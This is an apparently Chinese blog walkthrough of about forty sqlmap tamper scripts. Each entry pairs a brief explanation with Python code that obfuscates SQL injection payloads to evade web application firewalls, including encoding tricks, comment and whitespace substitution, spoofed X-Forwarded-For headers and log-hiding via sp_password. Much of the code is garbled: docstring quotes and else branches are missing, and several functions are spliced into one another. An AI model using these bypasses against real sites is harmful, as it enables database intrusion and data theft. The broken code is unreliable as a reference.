Sqlmap tamper解读


1.apostrophemask 把’使用%EF%BC%87进行替换【类似款字节】

def tamper(payload, **kwargs):
    Replaces apostrophe character with its UTF-8 full width counterpart
        * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128
        * http://lukasz.pilorz.net/testy/unicode_conversion/
        * http://sla.ckers.org/forum/read.php?13,11562,11850
        * http://lukasz.pilorz.net/testy/full_width_utf/index.phps
    >>> tamper("1 AND '1'='1")
    '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
    return payload.replace('\'', "%EF%BC%87") if payload else payload

2.apostrophenullencode 将‘使用%00%27进行替换。中间增加%00

def tamper(payload, **kwargs):
    Replaces apostrophe character with its illegal double unicode counterpart
    >>> tamper("1 AND '1'='1")
    '1 AND %00%271%00%27=%00%271'
    return payload.replace('\'', "%00%27") if payload else payload

3.appendnullbyte 主要表现为在每行的最后增加一个%00

def tamper(payload, **kwargs):
    Appends encoded NULL byte character at the end of payload

        * Microsoft Access

        * Useful to bypass weak web application firewalls when the back-end
          database management system is Microsoft Access - further uses are
          also possible

    Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection

    >>> tamper('1 AND 1=1')
    '1 AND 1=1%00'

    return "%s%%00" % payload if payload else payload

4.base64encode 主要对当前的url进行base64编码达到传递的目的(针对使用bas6e传输的)

def tamper(payload, **kwargs):
    Base64 all characters in a given payload

    >>> tamper("1' AND SLEEP(5)#")

5.between 主要是替换一些使用 > = < 进行匹配的时候使用between来进行替换

def tamper(payload, **kwargs):
    Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
    Replaces equals operator ('=') with 'BETWEEN # AND #'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

        * Useful to bypass weak and bespoke web application firewalls that
          filter the greater than character
        * The BETWEEN clause is SQL standard. Hence, this tamper script
          should work against all (?) databases

    >>> tamper('1 AND A > B--')
    >>> tamper('1 AND A = B--')

    retVal = payload

    if payload:
        match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload)

        if match:
            _ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5))
            retVal = retVal.replace(match.group(0), _)
            retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", " NOT BETWEEN 0 AND \g<1>", payload)

        if retVal == payload:
            match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*(\w+)\s*", payload)

            if match:
                _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5))
                retVal = retVal.replace(match.group(0), _)

    return retVal
    return base64.b64encode(payload.encode(UNICODE_ENCODING)) if payload else payload

6.bluecoat 针对mysql的编码,再每个空格前使用%09来达到编码的目的

def tamper(payload, **kwargs):
    Replaces space character after SQL statement with a valid random blank character.
    Afterwards replace character = with LIKE operator

        * Blue Coat SGOS with WAF activated as documented in

    Tested against:
        * MySQL 5.1, SGOS

        * Useful to bypass Blue Coat's recommended WAF rule configuration

    >>> tamper('SELECT id FROM users WHERE id = 1')
    'SELECT%09id FROM%09users WHERE%09id LIKE 1'

    def process(match):
        word = match.group('word')
        if word.upper() in kb.keywords:
            return match.group().replace(word, "%s%%09" % word)
            return match.group()

    retVal = payload

    if payload:
        retVal = re.sub(r"\b(?P<word>[A-Z_]+)(?=[^\w(]|\Z)", lambda match: process(match), retVal)
        retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
        retVal = retVal.replace("%09 ", "%09")

    return retVal

7.chardoubleencode 对整个进行二次URL编码

def tamper(payload, **kwargs):
    Double url-encodes all characters in a given payload (not processing
    already encoded)

        * Useful to bypass some weak web application firewalls that do not
          double url-decode the request before processing it through their

    >>> tamper('SELECT FIELD FROM%20TABLE')

    retVal = payload

    if payload:
        retVal = ""
        i = 0

        while i < len(payload):
            if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
                retVal += '%%25%s' % payload[i + 1:i + 3]
                i += 3
                retVal += '%%25%.2X' % ord(payload[i])
                i += 1

    return retVal

8.charencode 对整个进行一次URL编码

def tamper(payload, **kwargs):
    Url-encodes all characters in a given payload (not processing already

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

        * Useful to bypass very weak web application firewalls that do not
          url-decode the request before processing it through their ruleset
        * The web server will anyway pass the url-decoded version behind,
          hence it should work against any DBMS

    >>> tamper('SELECT FIELD FROM%20TABLE')

    retVal = payload

    if payload:
        retVal = ""
        i = 0

        while i < len(payload):
            if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
                retVal += payload[i:i + 3]
                i += 3
                retVal += '%%%.2X' % ord(payload[i])
                i += 1

    return retVal

9.charunicodeencode 对整个进行Unicode编码(也就是S转换为%u0053)【主要体现在asp asp.net上】

def tamper(payload, **kwargs):
    Unicode-url-encodes non-encoded characters in a given payload (not
    processing already encoded)

        * ASP
        * ASP.NET

    Tested against:
        * Microsoft SQL Server 2000
        * Microsoft SQL Server 2005
        * MySQL 5.1.56
        * PostgreSQL 9.0.3

        * Useful to bypass weak web application firewalls that do not
          unicode url-decode the request before processing it through their

    >>> tamper('SELECT FIELD%20FROM TABLE')

    retVal = payload

    if payload:
        retVal = ""
        i = 0

        while i < len(payload):
            if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
                retVal += "%%u00%s" % payload[i + 1:i + 3]
                i += 3
                retVal += '%%u%.4X' % ord(payload[i])
                i += 1

    return retVal

10.concat2concatws 主要是作用于把CONCAT(A, B)替换为CONCAT_WS(MID(CHAR(0), 0, 0), A, B)

def tamper(payload, **kwargs):
    Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'

        * MySQL

    Tested against:
        * MySQL 5.0

        * Useful to bypass very weak and bespoke web application firewalls
          that filter the CONCAT() function

    >>> tamper('CONCAT(1,2)')

    if payload:
        payload = payload.replace("CONCAT(", "CONCAT_WS(MID(CHAR(0),0,0),")

    return payload

11.equaltolike 把等于使用like进行替换

def tamper(payload, **kwargs):
    Replaces all occurances of operator equal ('=') with operator 'LIKE'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5

        * Useful to bypass weak and bespoke web application firewalls that
          filter the equal character ('=')
        * The LIKE operator is SQL standard. Hence, this tamper script
          should work against all (?) databases

    >>> tamper('SELECT * FROM users WHERE id=1')
    'SELECT * FROM users WHERE id LIKE 1'

    retVal = payload

    if payload:
        retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)

    return retVal

12.greatest 主要的作用是把A>B使用GREATEST(A,B+1)=A进行替换

def tamper(payload, **kwargs):
    Replaces greater than operator ('>') with 'GREATEST' counterpart

    Tested against:
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

        * Useful to bypass weak and bespoke web application firewalls that
          filter the greater than character
        * The GREATEST clause is a widespread SQL command. Hence, this
          tamper script should work against majority of databases

    >>> tamper('1 AND A > B')
    '1 AND GREATEST(A,B+1)=A'

    retVal = payload

    if payload:
        match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>#-]+)", payload)

        if match:
            _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(4), match.group(5), match.group(4))
            retVal = retVal.replace(match.group(0), _)

    return retVal

13.halfversionedmorekeywords 使用/*!0替换空格

def tamper(payload, **kwargs):
    Adds versioned MySQL comment before each keyword

        * MySQL < 5.1

    Tested against:
        * MySQL 4.0.18, 5.0.22

        * Useful to bypass several web application firewalls when the
          back-end database management system is MySQL
        * Used during the ModSecurity SQL injection challenge,

    >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
    "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

    def process(match):
        word = match.group('word')
        if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
            return match.group().replace(word, "/*!0%s" % word)
            return match.group()

    retVal = payload

    if payload:
        retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal)
        retVal = retVal.replace(" /*!0", "/*!0")

    return retVal

14.lowercase 主要是把大写转换为小写

def tamper(payload, **kwargs):
    Replaces each keyword character with lower case value

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions
        * This tamper script should work against all (?) databases

    >>> tamper('INSERT')

    retVal = payload

    if payload:
        for match in re.finditer(r"[A-Za-z_]+", retVal):
            word = match.group()

            if word.upper() in kb.keywords:
                retVal = retVal.replace(word, word.lower())

    return retVal

15.modsecurityversioned 在两个变量之间加上 /!30%/" 类似于1 AND 2>1-- 转为 1 /!30874AND 2>1/–

def tamper(payload, **kwargs):
    Embraces complete query with versioned comment

        * MySQL

    Tested against:
        * MySQL 5.0

        * Useful to bypass ModSecurity WAF/IDS

    >>> import random
    >>> random.seed(0)
    >>> tamper('1 AND 2>1--')
    '1 /*!30874AND 2>1*/--'

    retVal = payload

    if payload:
        postfix = ''
        for comment in ('#', '--', '/*'):
            if comment in payload:
                postfix = payload[payload.find(comment):]
                payload = payload[:payload.find(comment)]
        if ' ' in payload:
            retVal = "%s /*!30%s%s*/%s" % (payload[:payload.find(' ')], randomInt(3), payload[payload.find(' ') + 1:], postfix)

    return retVal

16.modsecurityzeroversioned 在两个变量之间加上 /!00000 类似于1 AND 2>1-- 转为 1 /!00000AND 2>1*/–

def tamper(payload, **kwargs):
    Embraces complete query with zero-versioned comment

        * MySQL

    Tested against:
        * MySQL 5.0

        * Useful to bypass ModSecurity WAF/IDS

    >>> tamper('1 AND 2>1--')
    '1 /*!00000AND 2>1*/--'

    retVal = payload

    if payload:
        postfix = ''
        for comment in ('#', '--', '/*'):
            if comment in payload:
                postfix = payload[payload.find(comment):]
                payload = payload[:payload.find(comment)]
        if ' ' in payload:
            retVal = "%s /*!00000%s*/%s" % (payload[:payload.find(' ')], payload[payload.find(' ') + 1:], postfix)

    return retVal

17.multiplespaces 增加空格的个数。类似把一个空格使用4个空格(或者TAB)替换

def tamper(payload, **kwargs):
    Adds multiple spaces around SQL keywords

        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions

    Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt

    >>> random.seed(0)
    >>> tamper('1 UNION SELECT foobar')
    '1    UNION     SELECT   foobar'

    retVal = payload

    if payload:
        words = set()

        for match in re.finditer(r"[A-Za-z_]+", payload):
            word = match.group()

            if word.upper() in kb.keywords:

        for word in words:
            retVal = re.sub("(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randrange(1, 4), word, ' ' * random.randrange(1, 4)), retVal)
            retVal = re.sub("(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randrange(1, 4), word), retVal)

    return retVal

18.nonrecursivereplacement 主要是在(“UNION”, “SELECT”, “INSERT”, “UPDATE”, “FROM”, “WHERE”)中间继续填充一个关键词。

def tamper(payload, **kwargs):
    Replaces predefined SQL keywords with representations
    suitable for replacement (e.g. .replace("SELECT", "")) filters

        * Useful to bypass very weak custom filters

    >>> random.seed(0)
    >>> tamper('1 UNION SELECT 2--')

    keywords = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE")
    retVal = payload

    warnMsg = "currently only couple of keywords are being processed %s. " % str(keywords)
    warnMsg += "You can set it manually according to your needs"

    if payload:
        for keyword in keywords:
            _ = random.randint(1, len(keyword) - 1)
            retVal = re.sub(r"(?i)\b%s\b" % keyword, "%s%s%s" % (keyword[:_], keyword, keyword[_:]), retVal)

    return retVal

19.overlongutf8 主要为使用%C0%AA替换空格

def tamper(payload, **kwargs):
    Converts all characters in a given payload (not processing already

    Reference: https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/

    >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')

    retVal = payload

    if payload: 
        retVal = ""
        i = 0

        while i < len(payload):
            if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
                retVal += payload[i:i + 3]
                i += 3
                if payload[i] not in (string.ascii_letters + string.digits):
                    retVal += "%%C0%%%.2X" % (0x8A | ord(payload[i]))
                    retVal += payload[i]
                i += 1

    return retVal

20.percentage 主要是使用%分割关键词类似于把SELECT 转换为%S%E%L%E%C%T

def tamper(payload, **kwargs):
    Adds a percentage sign ('%') infront of each character

        * ASP

    Tested against:
        * Microsoft SQL Server 2000, 2005
        * MySQL 5.1.56, 5.5.11
        * PostgreSQL 9.0

def tamper(payload, **kwargs):
    Replaces each keyword character with random case value

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions
        * This tamper script should work against all (?) databases

    >>> import random
    >>> random.seed(0)
    >>> tamper('INSERT')

    retVal = payload

    if payload:
        for match in re.finditer(r"[A-Za-z_]+", retVal):
            word = match.group()

            if word.upper() in kb.keywords:
                while True:
                    _ = ""

                    for i in xrange(len(word)):
                        _ += word[i].upper() if randomRange(0, 1) else word[i].lower()

                    if len(_) > 1 and _ not in (_.lower(), _.upper()):

                retVal = retVal.replace(word, _)

    return retVal        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT FIELD FROM TABLE')
    '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'

    if payload:
        retVal = ""
        i = 0

        while i < len(payload):
            if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
                retVal += payload[i:i + 3]
                i += 3
            payload[i] != ' ':
                retVal += '%%%s' % payload[i]
                i += 1
                retVal += payload[i]
                i += 1

    return retVal

21.randomcase 随机转换大小写。类似于INSERT转换为INseRt

def tamper(payload, **kwargs):
    Replaces each keyword character with random case value

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions
        * This tamper script should work against all (?) databases

    >>> import random
    >>> random.seed(0)
    >>> tamper('INSERT')

    retVal = payload

    if payload:
        for match in re.finditer(r"[A-Za-z_]+", retVal):
            word = match.group()

            if word.upper() in kb.keywords:
                while True:
                    _ = ""

                    for i in xrange(len(word)):
                        _ += word[i].upper() if randomRange(0, 1) else word[i].lower()

                    if len(_) > 1 and _ not in (_.lower(), _.upper()):

                retVal = retVal.replace(word, _)

    return retVal

22.randomcomments 随机在关键词间插入//.类似INSERT转换为I//N/**/SERT

def tamper(payload, **kwargs):
    Add random comments to SQL keywords

    >>> import random
    >>> random.seed(0)
    >>> tamper('INSERT')

    retVal = payload

    if payload:
        for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
            word = match.group()

            if len(word) < 2:

            if word.upper() in kb.keywords:
                _ = word[0]

                for i in xrange(1, len(word) - 1):
                    _ += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i])

                _ += word[-1]

                if "/**/" not in _:
                    index = randomRange(1, len(word) - 1)
                    _ = word[:index] + "/**/" + word[index:]

                retVal = retVal.replace(word, _)

    return retVal

23.securesphere 再末尾增加and ‘0having’='0having

def tamper(payload, **kwargs):
    Appends special crafted string

        * Useful for bypassing Imperva SecureSphere WAF
        * Reference: http://seclists.org/fulldisclosure/2011/May/163

    >>> tamper('1 AND 1=1')
    "1 AND 1=1 and '0having'='0having'"

    return payload + " and '0having'='0having'" if payload else payload

24.sp_password 针对MSSQL的一种办法。在–后面增加sp_password

def tamper(payload, **kwargs):
    Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs

        * MSSQL

        * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure
        * Reference: http://websec.ca/kb/sql_injection

    >>> tamper('1 AND 9227=9227-- ')
    '1 AND 9227=9227-- sp_password'

    retVal = ""

    if payload:
        retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "")

    return retVal

25.space2comment 使用/**/替换空格

def tamper(payload, **kwargs):
    Replaces space character (' ') with comments '/**/'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += "/**/"

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += "/**/"

            retVal += payload[i]

    return retVal

26.space2dash 使用–(rand)%0A替换掉空格

def tamper(payload, **kwargs):
    Replaces space character (' ') with a dash comment ('--') followed by
    a random string and a new line ('\n')

        * MSSQL
        * SQLite

        * Useful to bypass several web application firewalls
        * Used during the ZeroNights SQL injection challenge,

    >>> random.seed(0)
    >>> tamper('1 AND 9227=9227')

    retVal = ""

    if payload:
        for i in xrange(len(payload)):
            if payload[i].isspace():
                randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
                retVal += "--%s%%0A" % randomStr
            elif payload[i] == '#' or payload[i:i + 3] == '-- ':
                retVal += payload[i:]
                retVal += payload[i]

    return retVal

27.space2hash 使用%23(rand)%0A来替换空格

def tamper(payload, **kwargs):
    Replaces space character (' ') with a pound character ('#') followed by
    a random string and a new line ('\n')

        * MySQL

    Tested against:
        * MySQL 4.0, 5.0

        * Useful to bypass several web application firewalls
        * Used during the ModSecurity SQL injection challenge,

    >>> random.seed(0)
    >>> tamper('1 AND 9227=9227')

    retVal = ""

    if payload:
        for i in xrange(len(payload)):
            if payload[i].isspace():
                randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
                retVal += "%%23%s%%0A" % randomStr
            elif payload[i] == '#' or payload[i:i + 3] == '-- ':
                retVal += payload[i:]
                retVal += payload[i]

    return retVal

28.space2morehash 使用多个%23(rand)%0A来替换空格

def tamper(payload, **kwargs):
    Replaces space character (' ') with a pound character ('#') followed by
    a random string and a new line ('\n')

        * MySQL >= 5.1.13

    Tested against:
        * MySQL 5.1.41

        * Useful to bypass several web application firewalls
        * Used during the ModSecurity SQL injection challenge,

    >>> random.seed(0)
    >>> tamper('1 AND 9227=9227')

    def process(match):
        word = match.group('word')
        randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))

        if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
            return match.group().replace(word, "%s%%23%s%%0A" % (word, randomStr))
            return match.group()

    retVal = ""

    if payload:
        payload = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), payload)

        for i in xrange(len(payload)):
            if payload[i].isspace():
                randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
                retVal += "%%23%s%%0A" % randomStr
            elif payload[i] == '#' or payload[i:i + 3] == '-- ':
                retVal += payload[i:]
                retVal += payload[i]

    return retVal

29.space2mssqlblank 针对MSSQL使用特定的字符替换空格
特定的字符(’%01’, ‘%02’, ‘%03’, ‘%04’, ‘%05’, ‘%06’, ‘%07’, ‘%08’, ‘%09’, ‘%0B’, ‘%0C’, ‘%0D’, ‘%0E’, ‘%0F’, ‘%0A’)

def tamper(payload, **kwargs):
    Replaces space character (' ') with a random blank character from a
    valid set of alternate characters

        * Microsoft SQL Server

    Tested against:
        * Microsoft SQL Server 2000
        * Microsoft SQL Server 2005

        * Useful to bypass several web application firewalls

    >>> random.seed(0)
    >>> tamper('SELECT id FROM users')

    # ASCII table:
    #   SOH     01      start of heading
    #   STX     02      start of text
    #   ETX     03      end of text
    #   EOT     04      end of transmission
    #   ENQ     05      enquiry
    #   ACK     06      acknowledge
    #   BEL     07      bell
    #   BS      08      backspace
    #   TAB     09      horizontal tab
    #   LF      0A      new line
    #   VT      0B      vertical TAB
    #   FF      0C      new page
    #   CR      0D      carriage return
    #   SO      0E      shift out
    #   SI      0F      shift in
    blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')
    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace, end = False, False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += random.choice(blanks)

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == '#' or payload[i:i + 3] == '-- ':
                end = True

            elif payload[i] == " " and not doublequote and not quote:
                if end:
                    retVal += random.choice(blanks[:-1])
                    retVal += random.choice(blanks)


            retVal += payload[i]

    return retVal

30.space2mssqlhash 使用%23%0A来替换空格

def tamper(payload, **kwargs):
    Replaces space character (' ') with a pound character ('#') followed by
    a new line ('\n')

        * MSSQL
        * MySQL

        * Useful to bypass several web application firewalls

    >>> tamper('1 AND 9227=9227')

    retVal = ""

    if payload:
        for i in xrange(len(payload)):
            if payload[i].isspace():
                retVal += "%23%0A"
            elif payload[i] == '#' or payload[i:i + 3] == '-- ':
                retVal += payload[i:]
                retVal += payload[i]

    return retVal

31.space2mysqlblank 针对MYSQL使用特定的字符来替换空格
特定的字符(’%09’, ‘%0A’, ‘%0C’, ‘%0D’, ‘%0B’)

def tamper(payload, **kwargs):
    Replaces space character (' ') with a random blank character from a
    valid set of alternate characters

        * MySQL

    Tested against:
        * MySQL 5.1

        * Useful to bypass several web application firewalls

    >>> random.seed(0)
    >>> tamper('SELECT id FROM users')

    # ASCII table:
    #   TAB     09      horizontal TAB
    #   LF      0A      new line
    #   FF      0C      new page
    #   CR      0D      carriage return
    #   VT      0B      vertical TAB        (MySQL and Microsoft SQL Server only)
    blanks = ('%09', '%0A', '%0C', '%0D', '%0B')
    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += random.choice(blanks)

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += random.choice(blanks)

            retVal += payload[i]

    return retVal

32.space2mysqldash 针对MYSQL使用–%0A来替换空格

def tamper(payload, **kwargs):
    Replaces space character (' ') with a dash comment ('--') followed by
    a new line ('\n')

        * MySQL
        * MSSQL

    Tested against:

        * Useful to bypass several web application firewalls.

    >>> tamper('1 AND 9227=9227')

    retVal = ""

    if payload:
        for i in xrange(len(payload)):
            if payload[i].isspace():
                retVal += "--%0A"
            elif payload[i] == '#' or payload[i:i + 3] == '-- ':
                retVal += payload[i:]
                retVal += payload[i]

    return retVal

33.space2plus 主要用于使用+替换空格符

def tamper(payload, **kwargs):
    Replaces space character (' ') with plus ('+')
        * Is this any useful? The plus get's url-encoded by sqlmap engine
          invalidating the query afterwards
        * This tamper script works against all databases
    >>> tamper('SELECT id FROM users')
    retVal = payload
    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False
        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += "+"
            elif payload[i] == '\'':
                quote = not quote
            elif payload[i] == '"':
                doublequote = not doublequote
            elif payload[i] == " " and not doublequote and not quote:
                retVal += "+"
            retVal += payload[i]
    return retVal

34.space2randomblank主要用"%09", “%0A”, “%0C”, "%0D"替换注入中的空格

def tamper(payload, **kwargs):
    Replaces space character (' ') with a random blank character from a
    valid set of alternate characters
    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0
        * Useful to bypass several web application firewalls
    >>> random.seed(0)
    >>> tamper('SELECT id FROM users')
    # ASCII table:
    #   TAB     09      horizontal TAB
    #   LF      0A      new line
    #   FF      0C      new page
    #   CR      0D      carriage return
    blanks = ("%09", "%0A", "%0C", "%0D")
    retVal = payload
    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False
        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += random.choice(blanks)
            elif payload[i] == '\'':
                quote = not quote
            elif payload[i] == '"':
                doublequote = not doublequote
            elif payload[i] == ' ' and not doublequote and not quote:
                retVal += random.choice(blanks)
            retVal += payload[i]
    return retVal

35.symboliclogical 该插件主要是在and被过来后使用&& 以及||

def tamper(payload, **kwargs):
    Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
    >>> tamper("1 AND '1'='1")
    "1 %26%26 '1'='1"

    retVal = payload

    if payload:
        retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload))

    return retVal

36.unionalltounion 该插件主要是替换掉union all select 里面的all

def tamper(payload, **kwargs):
    >>> tamper('-1 UNION ALL SELECT')

    return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload

37.unmagicquotes 主要用在宽字节注入,绕过magic_quotes/addslashes

def tamper(payload, **kwargs):
    Replaces quote character (') with a multi-byte combo %bf%27 together with
    generic comment at the end (to make it work)
        * Useful for bypassing magic_quotes/addslashes feature
        * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
    >>> tamper("1' AND 1=1")
    '1%bf%27-- '

    retVal = payload

    if payload:
        found = False
        retVal = ""

        for i in xrange(len(payload)):
            if payload[i] == '\'' and not found:
                retVal += "%bf%27"
                found = True
                retVal += payload[i]

        if found:
            _ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal)
            if _ != retVal:
                retVal = _
                retVal += "-- "
            elif not any(_ in retVal for _ in ('#', '--', '/*')):
                retVal += "-- "
    return retVal

38.varnish 主要是用于X-originating-IP可以绕过部分认证

def tamper(payload, **kwargs):
    Append a HTTP header 'X-originating-IP' to bypass
    WAF Protection of Varnish Firewall
        Reference: http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366
        >> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)
        >> X-remote-IP: TARGET_PROXY_IP (184.189.250.X)
        >> X-originating-IP: TARGET_LOCAL_IP (
        >> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)
        >> X-remote-IP: * or %00 or %0A

    headers = kwargs.get("headers", {})
    headers["X-originating-IP"] = ""
    return payload

39.versionedmorekeywords 该插件主要是在mysql敏感词两旁加/!%s/

tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')

    def process(match):
        word = match.group('word')
        if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
            return match.group().replace(word, "/*!%s*/" % word)
            return match.group()

    retVal = payload

    if payload:
        retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal)
        retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/")

40.xforwardedfor.py 该插件主要用于随机xforwardedfor

def randomIP():
    numbers = []
    while not numbers or numbers[0] in (10, 172, 192):
        numbers = sample(xrange(1, 255), 4)
    return '.'.join(str(_) for _ in numbers)

def tamper(payload, **kwargs):
    Append a fake HTTP header 'X-Forwarded-For' to bypass
    WAF (usually application based) protection

    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = randomIP()
    return payload


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